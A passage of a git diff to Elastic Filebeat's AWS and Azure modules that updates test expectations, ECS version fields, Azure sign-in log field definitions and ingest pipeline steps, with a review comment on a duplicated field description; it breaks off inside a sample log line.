b/x-pack/filebeat/module/aws/cloudtrail/test/stop-logging-json.log-expected.json index 266cded86f2..5463d50587b 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/stop-logging-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/stop-logging-json.log-expected.json 
@@ -39,6 +39,7 @@ "user.id": "EXAMPLE_ID", "user.name": "Alice", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-access-key-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-access-key-json.log-expected.json index 4b30eaed7ae..9a3463220a9 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/update-access-key-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-access-key-json.log-expected.json @@ -48,6 +48,7 @@ "user.name": "Alice", "user.target.name": "Bob", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-accout-password-policy-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-accout-password-policy-json.log-expected.json index edb7444604b..3f5caf284b7 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/update-accout-password-policy-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-accout-password-policy-json.log-expected.json @@ -49,6 +49,7 @@ "user.id": "EXAMPLE_ID", "user.name": "Alice", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-group-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-group-json.log-expected.json index 95827327cec..43bc59eaf80 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/update-group-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-group-json.log-expected.json 
@@ -43,6 +43,7 @@ "user.id": "0123456789012", "user.name": "Alice", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "aws-cli", "user_agent.original": "aws-cli/1.16.310 Python/3.8.1 Darwin/18.7.0 botocore/1.13.46", "user_agent.version": "1.16.310" @@ -93,6 +94,7 @@ "user.id": "0123456789012", "user.name": "Alice", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "aws-cli", "user_agent.original": "aws-cli/1.16.310 Python/3.8.1 Darwin/18.7.0 botocore/1.13.46", "user_agent.version": "1.16.310" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-login-profile-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-login-profile-json.log-expected.json index 6992dc1a978..907a935f53f 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/update-login-profile-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-login-profile-json.log-expected.json @@ -46,6 +46,7 @@ "user.name": "Alice", "user.target.name": "Bob", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-ssh-public-key-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-ssh-public-key-json.log-expected.json index 12efc4cf071..1d5fe8f519a 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/update-ssh-public-key-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-ssh-public-key-json.log-expected.json @@ -48,6 +48,7 @@ "user.name": "Alice", "user.target.name": "Bob", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" }, 
@@ -100,6 +101,7 @@ "user.name": "Alice", "user.target.name": "Bob", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log-expected.json index 1d00ae0c171..7174ce8774e 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log-expected.json @@ -47,6 +47,7 @@ "user.id": "EX_PRINCIPAL_ID", "user.name": "Alice", "user_agent.device.name": "Spider", + "user_agent.device.type": "Desktop", "user_agent.name": "aws-cli", "user_agent.original": "aws-cli/1.10.32 Python/2.7.9 Windows/7 botocore/1.4.22", "user_agent.os.name": "Windows", @@ -107,6 +108,7 @@ "user.id": "EXAMPLE_ID", "user.name": "Alice", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-user-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-user-json.log-expected.json index 068c1db631a..28a6ffc218f 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/update-user-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-user-json.log-expected.json @@ -46,6 +46,7 @@ "user.name": "Alice", "user.target.name": "Bob", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "aws-cli", "user_agent.original": "aws-cli/1.16.310 Python/3.8.1 Darwin/18.7.0 botocore/1.13.46", "user_agent.version": "1.16.310" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/upload-ssh-public-key-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/upload-ssh-public-key-json.log-expected.json index d81ec8fa25b..b57283c9d75 100644 
--- a/x-pack/filebeat/module/aws/cloudtrail/test/upload-ssh-public-key-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/upload-ssh-public-key-json.log-expected.json @@ -47,6 +47,7 @@ "user.name": "Alice", "user.target.name": "Alice", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudwatch/config/aws-s3.yml b/x-pack/filebeat/module/aws/cloudwatch/config/aws-s3.yml index c156fac870b..9d0605877da 100644 --- a/x-pack/filebeat/module/aws/cloudwatch/config/aws-s3.yml +++ b/x-pack/filebeat/module/aws/cloudwatch/config/aws-s3.yml @@ -52,4 +52,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/aws/cloudwatch/config/file.yml b/x-pack/filebeat/module/aws/cloudwatch/config/file.yml index 8e04baa3395..1feedff152e 100644 --- a/x-pack/filebeat/module/aws/cloudwatch/config/file.yml +++ b/x-pack/filebeat/module/aws/cloudwatch/config/file.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/aws/ec2/config/aws-s3.yml b/x-pack/filebeat/module/aws/ec2/config/aws-s3.yml index c156fac870b..9d0605877da 100644 --- a/x-pack/filebeat/module/aws/ec2/config/aws-s3.yml +++ b/x-pack/filebeat/module/aws/ec2/config/aws-s3.yml @@ -52,4 +52,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/aws/ec2/config/file.yml b/x-pack/filebeat/module/aws/ec2/config/file.yml index 8e04baa3395..1feedff152e 100644 --- a/x-pack/filebeat/module/aws/ec2/config/file.yml +++ b/x-pack/filebeat/module/aws/ec2/config/file.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 
diff --git a/x-pack/filebeat/module/aws/elb/config/aws-s3.yml b/x-pack/filebeat/module/aws/elb/config/aws-s3.yml
index c156fac870b..9d0605877da 100644
--- a/x-pack/filebeat/module/aws/elb/config/aws-s3.yml
+++ b/x-pack/filebeat/module/aws/elb/config/aws-s3.yml
@@ -52,4 +52,4 @@ processors:
 - add_fields:
 target: ''
 fields:
- ecs.version: 1.8.0
+ ecs.version: 1.9.0
diff --git a/x-pack/filebeat/module/aws/elb/config/file.yml b/x-pack/filebeat/module/aws/elb/config/file.yml
index 4242dc4cd7b..a2e28f634ea 100644
--- a/x-pack/filebeat/module/aws/elb/config/file.yml
+++ b/x-pack/filebeat/module/aws/elb/config/file.yml
@@ -11,4 +11,4 @@ processors:
 - add_fields:
 target: ''
 fields:
- ecs.version: 1.8.0
+ ecs.version: 1.9.0
diff --git a/x-pack/filebeat/module/aws/s3access/config/aws-s3.yml b/x-pack/filebeat/module/aws/s3access/config/aws-s3.yml
index c156fac870b..9d0605877da 100644
--- a/x-pack/filebeat/module/aws/s3access/config/aws-s3.yml
+++ b/x-pack/filebeat/module/aws/s3access/config/aws-s3.yml
@@ -52,4 +52,4 @@ processors:
 - add_fields:
 target: ''
 fields:
- ecs.version: 1.8.0
+ ecs.version: 1.9.0
diff --git a/x-pack/filebeat/module/aws/s3access/config/file.yml b/x-pack/filebeat/module/aws/s3access/config/file.yml
index 4242dc4cd7b..a2e28f634ea 100644
--- a/x-pack/filebeat/module/aws/s3access/config/file.yml
+++ b/x-pack/filebeat/module/aws/s3access/config/file.yml
@@ -11,4 +11,4 @@ processors:
 - add_fields:
 target: ''
 fields:
- ecs.version: 1.8.0
+ ecs.version: 1.9.0
diff --git a/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log-expected.json b/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log-expected.json
index aa9d1bf6938..4f260cc6118 100644
--- a/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log-expected.json
+++ b/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log-expected.json
@@ -66,6 +66,7 @@ "url.path": "/test-s3-ks/", "url.query": "location&aws-account=627959692251", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "aws-sdk-java", "user_agent.original": "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation", "user_agent.os.full": "Linux 4.9.137", @@ -140,6 +141,7 @@ "url.path": "/test-s3-ks/", "url.query": "location&aws-account=627959692251", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "aws-sdk-java", "user_agent.original": "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation", "user_agent.os.full": "Linux 4.9.137", @@ -215,6 +217,7 @@ "url.path": "/test-s3-ks/", "url.query": "max-keys=0&encoding-type=url&aws-account=627959692251", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "aws-sdk-java", "user_agent.original": "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation", "user_agent.os.full": "Linux 4.9.137", @@ -289,6 +292,7 @@ "url.path": "/test-s3-ks/", "url.query": "location&aws-account=627959692251", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "aws-sdk-java", "user_agent.original": "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation", "user_agent.os.full": "Linux 4.9.137", 
diff --git a/x-pack/filebeat/module/aws/s3access/test/test.log-expected.json b/x-pack/filebeat/module/aws/s3access/test/test.log-expected.json index f6ca4d4edf3..de66c40e801 100644 --- a/x-pack/filebeat/module/aws/s3access/test/test.log-expected.json +++ b/x-pack/filebeat/module/aws/s3access/test/test.log-expected.json @@ -58,6 +58,7 @@ "url.path": "/awsexamplebucket", "url.query": "versioning", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "S3Console/0.4" }, @@ -120,6 +121,7 @@ "url.path": "/awsexamplebucket", "url.query": "logging", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "S3Console/0.4" }, @@ -184,6 +186,7 @@ "url.path": "/awsexamplebucket", "url.query": "policy", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "S3Console/0.4" }, @@ -246,6 +249,7 @@ "url.path": "/awsexamplebucket", "url.query": "versioning", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "S3Console/0.4" }, @@ -308,6 +312,7 @@ "url.original": "/awsexamplebucket/s3-dg.pdf", "url.path": "/awsexamplebucket/s3-dg.pdf", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "S3Console/0.4" }, @@ -369,6 +374,7 @@ "tls.version_protocol": "tls", "url.original": "*", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "S3Console/0.4" } diff --git a/x-pack/filebeat/module/aws/vpcflow/config/input.yml b/x-pack/filebeat/module/aws/vpcflow/config/input.yml index 1f1e085c082..54b45591f79 100644 --- a/x-pack/filebeat/module/aws/vpcflow/config/input.yml +++ b/x-pack/filebeat/module/aws/vpcflow/config/input.yml 
@@ -181,4 +181,4 @@ processors:
 - add_fields:
 target: ''
 fields:
- ecs.version: 1.8.0
+ ecs.version: 1.9.0
diff --git a/x-pack/filebeat/module/azure/activitylogs/config/azure-eventhub.yml b/x-pack/filebeat/module/azure/activitylogs/config/azure-eventhub.yml
index a949730a58f..9cb926a5990 100644
--- a/x-pack/filebeat/module/azure/activitylogs/config/azure-eventhub.yml
+++ b/x-pack/filebeat/module/azure/activitylogs/config/azure-eventhub.yml
@@ -31,4 +31,4 @@ processors:
 - add_fields:
 target: ''
 fields:
- ecs.version: 1.8.0
+ ecs.version: 1.9.0
diff --git a/x-pack/filebeat/module/azure/activitylogs/config/file.yml b/x-pack/filebeat/module/azure/activitylogs/config/file.yml
index 4242dc4cd7b..a2e28f634ea 100644
--- a/x-pack/filebeat/module/azure/activitylogs/config/file.yml
+++ b/x-pack/filebeat/module/azure/activitylogs/config/file.yml
@@ -11,4 +11,4 @@ processors:
 - add_fields:
 target: ''
 fields:
- ecs.version: 1.8.0
+ ecs.version: 1.9.0
diff --git a/x-pack/filebeat/module/azure/auditlogs/config/azure-eventhub.yml b/x-pack/filebeat/module/azure/auditlogs/config/azure-eventhub.yml
index a5460ed456e..83d9ff52c55 100644
--- a/x-pack/filebeat/module/azure/auditlogs/config/azure-eventhub.yml
+++ b/x-pack/filebeat/module/azure/auditlogs/config/azure-eventhub.yml
@@ -30,4 +30,4 @@ processors:
 - add_fields:
 target: ''
 fields:
- ecs.version: 1.8.0
+ ecs.version: 1.9.0
diff --git a/x-pack/filebeat/module/azure/auditlogs/config/file.yml b/x-pack/filebeat/module/azure/auditlogs/config/file.yml
index ded48a1474f..9089596a627 100644
--- a/x-pack/filebeat/module/azure/auditlogs/config/file.yml
+++ b/x-pack/filebeat/module/azure/auditlogs/config/file.yml
@@ -10,4 +10,4 @@ processors:
 - add_fields:
 target: ''
 fields:
- ecs.version: 1.8.0
+ ecs.version: 1.9.0
diff --git a/x-pack/filebeat/module/azure/fields.go b/x-pack/filebeat/module/azure/fields.go
index f37b4bf9ee8..d73cf818b09 100644
--- a/x-pack/filebeat/module/azure/fields.go
+++ b/x-pack/filebeat/module/azure/fields.go
@@ -19,5 +19,5 @@ func init() { // AssetAzure returns asset data. // This is the base64 encoded gzipped contents of module/azure. func AssetAzure() string { - return "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" + return "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" } diff --git a/x-pack/filebeat/module/azure/platformlogs/config/azure-eventhub.yml b/x-pack/filebeat/module/azure/platformlogs/config/azure-eventhub.yml index 49cfcef3a84..e54291d4b80 100644 --- a/x-pack/filebeat/module/azure/platformlogs/config/azure-eventhub.yml +++ b/x-pack/filebeat/module/azure/platformlogs/config/azure-eventhub.yml @@ -31,4 +31,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/azure/platformlogs/config/file.yml b/x-pack/filebeat/module/azure/platformlogs/config/file.yml index 4242dc4cd7b..a2e28f634ea 100644 --- a/x-pack/filebeat/module/azure/platformlogs/config/file.yml +++ b/x-pack/filebeat/module/azure/platformlogs/config/file.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/azure/signinlogs/_meta/fields.yml b/x-pack/filebeat/module/azure/signinlogs/_meta/fields.yml index 9cb2ebbe9ce..63b542f0271 100644 --- a/x-pack/filebeat/module/azure/signinlogs/_meta/fields.yml +++ b/x-pack/filebeat/module/azure/signinlogs/_meta/fields.yml 
@@ -163,4 +163,51 @@
 type: keyword
 description: >
 Status
-
+ - name: authentication_requirement_policies
+ type: keyword
+ description: >
+ Set of CA policies that apply to this sign-in, each as CA: policy name, and/or MFA: Per-user.
+ - name: applied_conditional_access_policies
+ type: nested
+ description: >
+ Details of the conditional access policies being applied for the sign-in.
+ - name: resource_tenant_id
+ type: keyword
+ description: >
+ The resource tenantId for B2B(business-to-business) scenarios.
+ - name: authentication_details
+ type: nested
+ description: >
+ A record of each step of authentication undertaken in the sign-in.
+ - name: authentication_processing_details
+ type: flattened
+ description: >
+ Provides the details associated with authentication processor.
+ - name: flagged_for_review
+ type: boolean
+ description: Event was flagged for review.
+ - name: network_location_details
+ type: keyword
+ description: >
+ Provides the details associated with authentication processor.
+ - name: risk_event_types
+ type: keyword
+ description: >
+ The list of risk event types associated with the sign-in.
+ - name: risk_event_types_v2
+ type: keyword
+ description: >
+ The list of risk event types associated with the sign-in.
+ - name: authentication_requirement
+ type: keyword
+ description: >
+ Type of authentication required for the sign-in. If set to
+ multiFactorAuthentication, an MFA step was required. If set to
+ singleFactorAuthentication, no MFA was required
+ - name: resource_id
+ type: keyword
+ description: >
+ ID of the resource that the user signed into.
+ - name: user_type
+ type: keyword
+ description: User type.
diff --git a/x-pack/filebeat/module/azure/signinlogs/config/azure-eventhub.yml b/x-pack/filebeat/module/azure/signinlogs/config/azure-eventhub.yml
index 9a6a86e08fa..8efc43474dc 100644
--- a/x-pack/filebeat/module/azure/signinlogs/config/azure-eventhub.yml
+++ b/x-pack/filebeat/module/azure/signinlogs/config/azure-eventhub.yml
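Review bot: `network_location_details` repeats the description of `authentication_processing_details` word for word ("Provides the details associated with authentication processor.") and is typed `keyword`, which looks like a copy-paste. The sample event added in this commit only carries `"networkLocationDetails":[]`, so the mapping is never exercised by the test; if populated entries arrive as objects, a `keyword` mapping would presumably reject the document and that sign-in event would be missing from the index. I would give the field its own description, for example `The network location details, including the type of network used and its names.`, and confirm the type against a populated sample (possibly `type: flattened`, as used for `authentication_processing_details`). `risk_event_types` and `risk_event_types_v2` also share one description; the v2 entry should say how it differs.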
@@ -30,4 +30,4 @@ processors:
 - add_fields:
 target: ''
 fields:
- ecs.version: 1.8.0
+ ecs.version: 1.9.0
diff --git a/x-pack/filebeat/module/azure/signinlogs/config/file.yml b/x-pack/filebeat/module/azure/signinlogs/config/file.yml
index ded48a1474f..9089596a627 100644
--- a/x-pack/filebeat/module/azure/signinlogs/config/file.yml
+++ b/x-pack/filebeat/module/azure/signinlogs/config/file.yml
@@ -10,4 +10,4 @@ processors:
 - add_fields:
 target: ''
 fields:
- ecs.version: 1.8.0
+ ecs.version: 1.9.0
diff --git a/x-pack/filebeat/module/azure/signinlogs/ingest/pipeline.yml b/x-pack/filebeat/module/azure/signinlogs/ingest/pipeline.yml
index e20115d6b05..800e7f01e60 100644
--- a/x-pack/filebeat/module/azure/signinlogs/ingest/pipeline.yml
+++ b/x-pack/filebeat/module/azure/signinlogs/ingest/pipeline.yml
@@ -155,6 +155,10 @@ processors:
 field: azure.signinlogs.properties.userId
 target_field: azure.signinlogs.properties.user_id
 ignore_missing: true
+- rename:
+ field: azure.signinlogs.properties.userType
+ target_field: azure.signinlogs.properties.user_type
+ ignore_missing: true
 - rename:
 field: azure.signinlogs.properties.appId
 target_field: azure.signinlogs.properties.app_id
@@ -247,6 +251,30 @@ processors:
 field: azure.signinlogs.properties.servicePrincipalId
 target_field: azure.signinlogs.properties.service_principal_id
 ignore_missing: true
+- rename:
+ field: azure.signinlogs.properties.resourceTenantId
+ target_field: azure.signinlogs.properties.resource_tenant_id
+ ignore_missing: true
+- rename:
+ field: azure.signinlogs.properties.flaggedForReview
+ target_field: azure.signinlogs.properties.flagged_for_review
+ ignore_missing: true
+- rename:
+ field: azure.signinlogs.properties.riskEventTypes
+ target_field: azure.signinlogs.properties.risk_event_types
+ ignore_missing: true
+- rename:
+ field: azure.signinlogs.properties.riskEventTypes_v2
+ target_field: azure.signinlogs.properties.risk_event_types_v2
+ ignore_missing: true
+- rename:
+ field: azure.signinlogs.properties.authenticationRequirement
+ target_field: azure.signinlogs.properties.authentication_requirement
+ ignore_missing: true
+- rename:
+ field: azure.signinlogs.properties.userAgent
+ target_field: user_agent.original
+ ignore_missing: true
 - remove:
 field:
 - azure.signinlogs.properties.location
@@ -307,6 +335,9 @@ processors:
 field: source.as.organization_name
 target_field: source.as.organization.name
 ignore_missing: true
+- user_agent:
+ field: user_agent.original
+ ignore_missing: true
 - pipeline:
 name: '{< IngestPipeline "azure-shared-pipeline" >}'
 on_failure:
diff --git a/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log b/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log
index 1160b01bc21..76dbbd93208 100644
--- a/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log
+++ b/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log
@@ -1,2 +1,3 @@ {"Level":4,"callerIpAddress":"81.171.241.231","category":"SignInLogs","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","durationMs":0,"identity":"Test LTest","location":"FR","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office 365","appId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","clientAppUsed":"Browser","conditionalAccessStatus":"notApplied","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","createdDateTime":"2019-10-18T04:45:48.0729893-05:00","deviceDetail":{"browser":"Chrome 77.0.3865","deviceId":"","operatingSystem":"MacOs"},"id":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ipAddress":"81.171.241.231","isInteractive":false,"location":{"city":"Champs-Sur-Marne","countryOrRegion":"FR","geoCoordinates":{"latitude":48.12341234,"longitude":2.12341234},"state":"Seine-Et-Marne"},"originalRequestId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","processingTimeInMilliseconds":239,"riskDetail":"none","riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":50140,"failureReason":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userDisplayName":"Test LTest","userId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","userPrincipalName":"test@elastic.co"},"resourceId":"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam","resultDescription":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.","resultSignature":"None","resultType":"50140","tenantId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","time":"2019-10-18T09:45:48.0729893Z"} {"Level":4,"callerIpAddress":"8.8.8.8","category":"SignInLogs","correlationId":"a8d4eb85-90c5-740d-9af6-7a15036cd135","durationMs":0,"identity":"Test LTest","location":"FR","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office 
365","appId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","clientAppUsed":"Browser","conditionalAccessStatus":"notApplied","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","createdDateTime":"2019-10-18T04:45:48.0729893-05:00","deviceDetail":{"browser":"Chrome 77.0.3865","deviceId":"","operatingSystem":"MacOs"},"id":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ipAddress":"81.171.241.231","isInteractive":false,"location":{"city":"Champs-Sur-Marne","countryOrRegion":"FR","geoCoordinates":{"latitude":48.12341234,"longitude":2.12341234},"state":"Seine-Et-Marne"},"originalRequestId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","processingTimeInMilliseconds":239,"riskDetail":"none","riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":50140,"failureReason":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userDisplayName":"Test LTest","userId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","userPrincipalName":"c3813493-bf92-5123-2717-8a8b2979c38b"},"resourceId":"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam","resultDescription":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.","resultSignature":"None","resultType":"50140","tenantId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","time":"2019-10-18T09:45:48.0729893Z"} +{"Level":4,"callerIpAddress":"8.8.8.8","category":"SignInLogs","correlationId":"1ba108d9-9609-48be-baee-afc0885baa06","durationMs":0,"identity":"Doe, John","location":"US","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office365 Shell WCSS-Client","appId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","appliedConditionalAccessPolicies":[{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"On-Prem Access 
Only","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"123ebbf1-e868-4a77-bfd9-b59bd6c2412e","result":"notApplied"},{"conditionsNotSatisfied":0,"conditionsSatisfied":0,"displayName":"ForceMFAfor B2C","enforcedGrantControls":[],"enforcedSessionControls":[],"id":"0dff3d49-001e-413f-86eb-2800e789674c","result":"notEnabled"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"Baseline policy: Require MFA for admins","enforcedGrantControls":["Mfa"],"enforcedSessionControls":[],"id":"a5527e71-9da1-41d0-859b-7ca84dae03a7","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"Baseline Policy: Blocks legacy authentication","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"c1311105-97ac-4ebd-a866-5b215d066765","result":"notApplied"},{"conditionsNotSatisfied":1,"conditionsSatisfied":0,"displayName":"Netscaler MFA","enforcedGrantControls":["Mfa"],"enforcedSessionControls":["SignInFrequency"],"id":"ee756a5f-8c3b-41eb-8ace-0839597f718a","result":"notApplied"},{"conditionsNotSatisfied":8,"conditionsSatisfied":19,"displayName":"Enforce Verification on External Access","enforcedGrantControls":["Mfa"],"enforcedSessionControls":["SignInFrequency"],"id":"913f5adc-cd20-4b35-93b8-fbe145f68444","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"Test Policy","enforcedGrantControls":["Mfa"],"enforcedSessionControls":[],"id":"cf0d2cec-b974-4fd3-a1d3-da4ae1e896fa","result":"notApplied"}],"authenticationDetails":[{"RequestSequence":0,"StatusSequence":0,"authenticationMethod":"Previously satisfied","authenticationStepDateTime":"2021-01-26T13:39:55.7863053+00:00","authenticationStepRequirement":"Primary authentication","authenticationStepResultDetail":"First factor requirement satisfied by claim in the token","succeeded":true}],"authenticationProcessingDetails":[{"key":"Domain Hint Present","value":"True"},{"key":"Login Hint Present","value":"True"},{"key":"Private 
Link Id","value":"0"},{"key":"Azure AD App Authentication Library","value":"Family: ADAL Library: ADAL.Js 1.0.15 Platform: JS"},{"key":"IsCAEToken","value":"False"}],"authenticationRequirement":"singleFactorAuthentication","authenticationRequirementPolicies":[],"clientAppUsed":"Browser","conditionalAccessStatus":"success","correlationId":"1ba108d9-9609-48be-baee-afc0885baa06","createdDateTime":"2021-01-26T13:39:55.7863053+00:00","deviceDetail":{"browser":"Chrome 87.0.4280","deviceId":"","operatingSystem":"Windows 10"},"flaggedForReview":false,"id":"a9222177-db03-40ef-9b86-5b207ed72000","ipAddress":"192.168.108.29","isInteractive":true,"location":{"city":"Pierre","countryOrRegion":"US","geoCoordinates":{"latitude":44.567081451416016,"longitude":-100.26722717285156},"state":"South Dakota"},"networkLocationDetails":[],"originalRequestId":"a9222177-db03-40ef-9b86-5b207ed72000","processingTimeInMilliseconds":162,"resourceDisplayName":"Microsoft Graph","resourceId":"00000003-0000-0000-c000-000000000000","resourceTenantId":"19aa547c-22ab-606d-a4b6-541c5ce52b71","riskDetail":"none","riskEventTypes":[],"riskEventTypes_v2":[],"riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":0},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36","userDisplayName":"Doe, 